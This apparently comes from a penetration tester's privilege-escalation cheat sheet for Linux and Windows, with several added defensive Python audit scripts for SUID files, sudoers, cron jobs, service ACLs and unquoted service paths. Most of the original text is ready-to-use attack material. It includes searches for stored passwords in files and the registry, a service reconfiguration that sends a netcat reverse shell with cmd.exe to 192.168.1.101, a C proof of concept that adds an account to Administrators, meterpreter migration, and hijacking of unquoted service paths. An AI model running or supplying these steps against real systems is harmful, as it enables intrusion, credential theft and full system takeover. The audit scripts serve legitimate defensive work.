The devil is in the detail. He literally is, not kidding. Once a limited shell is established on the system, it's a good idea to escalate privileges. Because why wouldn't you?

It's a good idea to get to know the system we are working with first.

Linux

Enumeration Script

Check distribution type and version

cat /etc/issue
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based

Check kernel version

rpm -q kernel
dmesg | grep Linux
cat /proc/version
uname -a
uname -mrs
ls /boot | grep vmlinuz-

Check env

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Check what ports are listening from inside

netstat -tulpn

Check services running owned by root

ps aux | grep root
ps -ef | grep root

Check information about applications installed

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

Check what jobs are scheduled

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Try to listen to live traffic

# BPF filter: HTTP towards 192.168.1.7 or FTP towards 10.5.5.252
tcpdump 'tcp and dst host 192.168.1.7 and dst port 80 or tcp and dst host 10.5.5.252 and dst port 21'

Self exploration

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

Find SUID and SGID misconfigurations and exploit them

When a binary has the SUID bit set, it runs as the file's owner rather than as the user who invoked it, which means root if root is the owner.

# Find SUID
find / -perm -u=s -type f 2>/dev/null

# Find SGID
find / -perm -g=s -type f 2>/dev/null

Check GTFOBins for known ways to abuse SUID binaries.
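A defender's counterpart to the two find commands, added here as an example (not code from the original post): it reads the output of find with a -printf format and flags set-id files that are world-writable, that sit in scratch directories, or that are not in a baseline of expected binaries. The baseline, the sample find output and the scratch-directory list are constructed assumptions; a real baseline would come from package metadata.

```python
"""Audit SUID/SGID binaries against a known-good baseline (added example).

Input is the text printed by
    find / -perm /6000 -type f -printf '%m %u %g %p\n' 2>/dev/null
i.e. octal mode, owner, group, path per line.
"""
from dataclasses import dataclass

# Constructed sample of what the find command above might print on a host.
SAMPLE_FIND_OUTPUT = """\
4755 root root /usr/bin/passwd
4755 root root /usr/bin/sudo
2755 root shadow /usr/bin/chage
4777 root root /opt/backup/runbackup
4755 root root /tmp/.x
6755 root root /usr/bin/custom-helper
"""

# Assumed baseline; normally generated from the package manager (e.g. dpkg -L).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chage"}

# Directories a root-owned SUID file should never live in (assumption).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


@dataclass
class Finding:
    path: str
    reason: str


def parse_find_line(line):
    """Split one '%m %u %g %p' line into (mode_int, owner, group, path)."""
    mode_str, owner, group, path = line.split(maxsplit=3)
    return int(mode_str, 8), owner, group, path


def audit_setid(find_output, baseline=BASELINE):
    """Return a list of Finding objects for set-id files that need review."""
    findings = []
    for line in find_output.splitlines():
        if not line.strip():
            continue
        mode, owner, group, path = parse_find_line(line)
        setuid = bool(mode & 0o4000)
        setgid = bool(mode & 0o2000)
        if mode & 0o002:
            # Anyone can replace the contents of a world-writable set-id file.
            findings.append(Finding(path, "set-id file is world-writable"))
        if setuid and owner == "root" and path.startswith(SUSPICIOUS_DIRS):
            findings.append(Finding(path, "root-owned SUID binary in a scratch or home directory"))
        if (setuid or setgid) and path not in baseline:
            findings.append(Finding(path, "set-id file not in baseline; check GTFOBins for its impact"))
    return findings


if __name__ == "__main__":
    for f in audit_setid(SAMPLE_FIND_OUTPUT):
        print(f"{f.path}: {f.reason}")
```

Pipe the real find output into `audit_setid` and regenerate the baseline after every package upgrade, otherwise legitimate updates show up as new findings.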

Abuse sudo rights

In case we have a restricted shell that can run some programs through sudo, we might be able to escalate our privileges with them. Any program that can write or overwrite files can be used. For example, if we have sudo rights to cp, we can overwrite /etc/shadow or /etc/sudoers with our own malicious file.

Check for any such available binaries (sudo -l) and again refer to the amazing GTFOBins.
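The review an administrator would run over /etc/sudoers to catch exactly the cp-style rule described above, added as an example and not code from the original post: it parses sudoers user specifications and reports rules that grant a non-root user either any command or an unrestricted file-writing program. The sample sudoers text and the starting set of file-writing programs are constructed assumptions; extend the set from GTFOBins for real reviews.

```python
"""Flag risky sudoers rules (added example, not from the original post)."""
import re

# Assumed starting set of programs that can write arbitrary files as root.
FILE_WRITERS = {"cp", "mv", "tee"}

# Constructed sample /etc/sudoers content.
SAMPLE_SUDOERS = """\
# sample sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /bin/cp
deploy  ALL=(root) /usr/bin/systemctl restart nginx
www     ALL=(root) NOPASSWD: /bin/cp /var/www/backup.tar /srv/backups/
"""

# user_or_group  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Expand each user specification into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({
                "who": m.group("who"),
                "runas": m.group("runas"),
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "cmd": cmd.strip(),
            })
    return rules


def risk_of(rule):
    """Return a reason string if the rule lets a non-root user write files as root."""
    if rule["who"] == "root":
        return None
    cmd = rule["cmd"]
    if cmd == "ALL":
        return "may run any command"
    parts = cmd.split()
    prog = parts[0].rsplit("/", 1)[-1]
    # A writer with fixed arguments is constrained; a bare writer is not.
    if prog in FILE_WRITERS and len(parts) == 1:
        return f"{prog} with unrestricted arguments can overwrite /etc/shadow or /etc/sudoers"
    return None


def risky_rules(text):
    """Return the rules from `text` that deserve review, with a reason attached."""
    out = []
    for rule in parse_rules(text):
        reason = risk_of(rule)
        if reason:
            out.append({**rule, "reason": reason})
    return out


if __name__ == "__main__":
    for r in risky_rules(SAMPLE_SUDOERS):
        print(f'{r["who"]}: {r["cmd"]} ({r["reason"]}, NOPASSWD={r["nopasswd"]})')
```

The rule for `www` is deliberately not flagged: cp with fixed source and destination cannot be redirected at /etc/shadow, which is the shape a constrained sudo rule should have.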

World writable scripts owned by root

If you find a script that is owned by root but is writable by anyone, you can add your own malicious code to that script, and it will escalate your privileges when the script is run as root. It might be part of a cron job, or otherwise automated, or it might be run by hand by a sysadmin. You can also check the scripts that are called by these scripts.

# World writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

# World executable directories
find / -perm -o=x -type d 2>/dev/null

# World writable and executable directories
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null
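A check for the cron case in particular, added as an example and not code from the original post: it parses system-crontab lines, and for every job that runs as root verifies that the command file is not writable by other users, is not missing, and does not sit in a world-writable directory without the sticky bit. The crontab text and the files it points at are constructed in a temporary directory so the check runs offline; for real use feed it /etc/crontab and /etc/cron.d/* with root="/".

```python
"""Find root cron jobs whose script can be modified by other users (added example)."""
import os
import stat
import tempfile


def writable_by_others(path):
    """Return a reason string if non-owner users can modify `path`, else None."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return "target is a symlink; resolve and re-check"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return "group-writable by a non-root group"
    return None


def parent_replaceable(path):
    """A world-writable parent directory without the sticky bit lets any user
    delete and recreate the file, even if the file itself is read-only."""
    st = os.stat(os.path.dirname(path))
    return bool(st.st_mode & stat.S_IWOTH) and not st.st_mode & stat.S_ISVTX


def check_crontab(text, root="/"):
    """Parse system-crontab lines (min hour dom mon dow user command) and report
    root jobs whose command file can be modified by other users.
    @reboot-style shortcuts are not handled here."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as PATH=...
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        if user != "root":
            continue
        target = command.split()[0]
        if not os.path.isabs(target):
            continue  # resolved via PATH; review separately
        path = os.path.join(root, target.lstrip("/"))
        if not os.path.exists(path):
            findings.append((target, "command file does not exist; a file created there later would run as root"))
            continue
        reason = writable_by_others(path)
        if reason:
            findings.append((target, reason))
        elif parent_replaceable(path):
            findings.append((target, "parent directory is world-writable without sticky bit"))
    return findings


def demo():
    """Build a constructed file tree and crontab, then run the check."""
    base = tempfile.mkdtemp()
    for d in ("usr/local/bin", "opt/scripts"):
        os.makedirs(os.path.join(base, d))
        os.chmod(os.path.join(base, d), 0o755)
    safe = os.path.join(base, "usr/local/bin/rotate.sh")
    loose = os.path.join(base, "opt/scripts/cleanup.sh")
    for p in (safe, loose):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho hi\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o777)  # the misconfiguration this section describes
    crontab = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user command
17 *    * * *   root  /usr/local/bin/rotate.sh
25 6    * * *   root  /opt/scripts/cleanup.sh --force
0  3    * * *   root  /opt/scripts/missing.sh
30 2    * * *   alice /opt/scripts/cleanup.sh
"""
    return check_crontab(crontab, root=base)


if __name__ == "__main__":
    for target, reason in demo():
        print(f"{target}: {reason}")
```

The missing-file case is reported on purpose: a dangling root cron entry is as dangerous as a writable one, since whoever can create the file decides what root runs.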

Windows

Self exploration

# Basics
systeminfo
hostname

# Who am I?
whoami
echo %username%

# What users/localgroups are on the machine?
net users
net localgroup

# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group "<Group Name>" /domain

# Firewall
netsh firewall show state
netsh firewall show config

# Network
ipconfig /all
route print
arp -a

# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

Look for passwords

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*

Look for passwords in files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

The passwords in these files are sometimes base64 encoded.

Look for passwords in registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# PuTTY
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Check for services only available from inside

netstat -ano

Kernel exploits

Use Sherlock to find missing software patches. Installed hotfixes/patches can also be listed with:

systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn

Find scheduled tasks

Look for scheduled tasks that run as a privileged user and execute a binary we can overwrite.

schtasks /query /fo LIST /v > schtask.txt
grep "SYSTEM\|Task To Run" schtask.txt | grep -B 1 SYSTEM

The first command is run on the Windows host; the second is run on Linux after copying schtask.txt over.

Change the upnp service binary

sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""

Weak service permissions

Services on Windows are programs that run in the background, without a GUI.
If you find a service binary that has write permissions set to Everyone, you can replace that binary with your custom binary and have it execute in the privileged context.
First we need to find the services. That can be done using wmic or sc.exe. wmic is not available on all Windows machines, and it might not be available to your user. If you don't have access to it, you can use sc.exe.

  • WMIC
    wmic service list brief

    This will produce a lot of output, and we need to know which of all these services have weak permissions. In order to check that we can use the icacls program. Notice that icacls is only available from Vista and up. XP and lower have cacls instead.
    As you can see in the commands below, you need to have access to wmic and icacls, and write privilege in C:\windows\temp.

    for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

    for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

    Binaries in system32 are excluded since they are mostly correct, as they are installed by Windows.

sc.exe

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Now you can process them one by one with the cacls command.

cacls "C:\path\to\file.exe"

What we are interested in is binaries that have been installed by the user. In the output you want to look for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.

Example:

C:\path\to\file.exe 
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F

That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. Then restart the service and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
Here is PoC code for getsuid:

#include <stdlib.h>

/* PoC: adds the named account to the local Administrators group when the
   replaced service binary runs as SYSTEM. "theusername" is a placeholder. */
int main(void)
{
    system("net localgroup administrators theusername /add");
    return 0;
}

We then compile it with mingw like this:

i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

We can restart the service now

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

The binary should now be executed in the SYSTEM or Administrator context.
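A parser for that ACL output, added here as an example and not part of the original post: it takes the cacls listing shown above (and an icacls listing, constructed in the same shape) for a given binary path and reports the principals that should never hold write rights on a service binary. The set of low-privileged principals and the write-right tokens are assumptions to adjust per environment; your own user or group can be passed in as an extra principal.

```python
"""Flag ACEs that give low-privileged principals write access to a service
binary, from cacls or icacls output (added example, not from the original post)."""

# Assumed set of principals that must not be able to modify a service binary.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Rights that let a principal replace the file contents (assumption).
# cacls letters: F = full, C = change, W = write.
# icacls tokens: F, M = modify, W = write, WD = write data, AD = append data.
WRITE_RIGHTS = {"F", "C", "W", "M", "WD", "AD"}

# The cacls listing from the text above.
SAMPLE_PATH = r"C:\path\to\file.exe"
SAMPLE_CACLS = r"""C:\path\to\file.exe
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
"""

# Constructed icacls listing (icacls prints the first ACE on the path line).
ICACLS_PATH = r"C:\Program Files\Vendor\agent.exe"
SAMPLE_ICACLS = r"""C:\Program Files\Vendor\agent.exe NT AUTHORITY\SYSTEM:(I)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Users:(I)(RX)
                                 Everyone:(M)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_acl(path, output):
    """Return a list of (principal, set_of_right_tokens) from cacls/icacls output
    for `path`. The path prefix is stripped so principals can contain spaces."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        if not line or ":" not in line:
            continue
        who, _, rights = line.rpartition(":")
        tokens = set()
        if rights.startswith("("):
            # icacls: (I)(F) or (OI)(CI)(W,D) -> {"I","F"} / {"OI","CI","W","D"}
            for group in rights.strip("()").split(")("):
                tokens.update(t.strip() for t in group.split(","))
        else:
            tokens.update(rights)  # cacls: single letters such as F or C
        aces.append((who.strip(), tokens))
    return aces


def weak_write_aces(path, output, extra_principals=()):
    """Principals from the low-privileged set that hold a write-capable right."""
    low = LOW_PRIV_PRINCIPALS | {p.lower() for p in extra_principals}
    return [who for who, tokens in parse_acl(path, output)
            if who.lower() in low and tokens & WRITE_RIGHTS]


if __name__ == "__main__":
    print("cacls :", weak_write_aces(SAMPLE_PATH, SAMPLE_CACLS))
    print("icacls:", weak_write_aces(ICACLS_PATH, SAMPLE_ICACLS))
```

The sample from the text reports BUILTIN\Users; BUILTIN\Power Users is only reported when passed as an extra principal, since whether that legacy group counts as low-privileged depends on the environment.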

Migrate the meterpreter shell

If your meterpreter session dies right after you get it, you need to migrate it to a more stable process. A common process to migrate to is winlogon.exe since it runs as SYSTEM and is always running. You can find the PID like this:

wmic process list brief | find "winlogon"

So when you get the shell you can either type migrate PID or automate this so that meterpreter migrates automatically.

Find and exploit unquoted service paths

If the path contains a space and is not quoted, the service is vulnerable.

  • Find services with unquoted paths

# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Using sc
sc query
sc qc <service name>

# Look for BINARY_PATH_NAME and see if it is unquoted.

  • Exploit it

If the path to the binary is:

c:\Program Files\something\winamp.exe

We can place a binary like this

c:\program.exe

When the service is restarted it will execute program.exe, which we of course control. This works in any directory that has a space in its name, not only Program Files.

  • There is also a Metasploit module for this: exploit/windows/local/trusted_service_path
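The same check as an audit script, added as an example and not code from the original post: it reads a service table in the shape of `wmic service get name,pathname,startmode /format:csv` (constructed sample, parsed by hand because wmic does not escape quotes in CSV), reports every unquoted path whose executable part contains a space, lists the locations Windows would try first (the c:\program.exe case above, generalized to every space in the path), and emits the quoted path the service should be reconfigured with. Treating the first ".exe" as the end of the executable is an assumption.

```python
"""Detect unquoted service paths containing spaces (added example)."""
import re

# Constructed sample in the shape of wmic's CSV output (leading blank line included).
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST,VendorAgent,C:\Program Files\Vendor App\agent.exe -service,Auto
HOST,SafeAgent,"C:\Program Files\Safe Vendor\agent.exe" -service,Auto
HOST,NetSvc,C:\Windows\system32\svchost.exe -k netsvcs,Auto
HOST,ToolSvc,C:\Tools Dir\thing.exe,Manual
"""

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def executable_part(pathname):
    """Heuristic (assumption): the executable ends at the first '.exe'."""
    m = EXE_RE.search(pathname)
    return pathname[:m.end()] if m else pathname.split()[0]


def unquoted_candidates(exe_path):
    """Paths Windows would try before the real one when the path is unquoted:
    every prefix ending at a space, with .exe appended."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def check_service_path(pathname):
    """Return None if the path is safe, else a dict describing the problem and fix."""
    s = pathname.strip()
    if s.startswith('"'):
        return None  # quoted: the loader knows exactly where the executable ends
    exe = executable_part(s)
    if " " not in exe:
        return None  # spaces only in the arguments are harmless
    args = s[len(exe):]
    return {
        "exe": exe,
        "candidates": unquoted_candidates(exe),
        "fixed": f'"{exe}"{args}',
    }


def audit_wmic_csv(text):
    """Parse Node,Name,PathName,StartMode rows and return findings for unquoted paths."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Node,"):
            continue
        node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)  # PathName may itself contain commas
        result = check_service_path(pathname)
        if result:
            result.update(name=name, startmode=startmode.strip())
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in audit_wmic_csv(SAMPLE_WMIC_CSV):
        print(f'{f["name"]} ({f["startmode"]}): tries {f["candidates"]} before {f["exe"]}')
        print(f'  fix: binPath should be {f["fixed"]}')
```

Manual-start services are reported too, with their start mode, because the page's own filter on "auto" hides services that an administrator or another process may start later; the remediation is the same quoted binPath either way.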